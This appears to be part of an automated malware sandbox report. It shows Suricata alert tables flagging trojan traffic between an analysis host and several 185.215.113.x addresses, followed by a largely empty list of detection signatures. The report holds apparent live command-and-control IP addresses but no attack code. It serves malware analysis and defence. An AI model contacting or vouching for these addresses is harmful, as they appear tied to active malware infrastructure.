| 2024-09-28T01:13:39.050479+0200 | 2856147 | 1 | A Network Trojan was detected | 192.168.2.7 | 49736 | 185.215.113.43 | 80 | TCP |
| 2024-09-28T01:18:52.241539+0200 | 2856147 | 1 | A Network Trojan was detected | 192.168.2.7 | 50245 | 185.215.113.43 | 80 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-28T01:13:47.452305+0200 | 2856122 | 1 | A Network Trojan was detected | 185.215.113.43 | 80 | 192.168.2.7 | 49745 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-28T01:13:42.385842+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49746 | 185.215.113.103 | 80 | TCP |
| 2024-09-28T01:13:53.237969+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49795 | 185.215.113.103 | 80 | TCP |
| 2024-09-28T01:13:58.394181+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49815 | 185.215.113.103 | 80 | TCP |
| 2024-09-28T01:14:01.767334+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49833 | 185.215.113.103 | 80 | TCP |
| 2024-09-28T01:14:05.003838+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49849 | 185.215.113.103 | 80 | TCP |
| 2024-09-28T01:14:08.965499+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49858 | 185.215.113.103 | 80 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-28T01:13:08.586930+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP |
| 2024-09-28T01:13:14.430106+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP |
| 2024-09-28T01:13:15.698192+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP |
| 2024-09-28T01:13:16.334270+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP |
| 2024-09-28T01:13:16.865362+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP |
| 2024-09-28T01:13:18.536546+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP |
| 2024-09-28T01:13:19.230981+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP |
| 2024-09-28T01:13:22.715881+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.7 | 49705 | 185.215.113.103 | 80 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Avira: | ||
| Source: | Malware Configuration Extractor: | ||
| Source: | Malware Configuration Extractor: | ||
| Source: | Malware Configuration Extractor: | ||
| Source: | ReversingLabs: | ||
| Source: | ReversingLabs: | ||
| Source: | Integrated Neural Analysis Model: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Code function: | 0_2_6CEB6C80 | |
| Source: | Static PE information: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
Networking | |
|---|
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | URLs: | ||
| Source: | URLs: | ||
| Source: | IPs: | ||
| Source: | HTTP traffic detected: | ||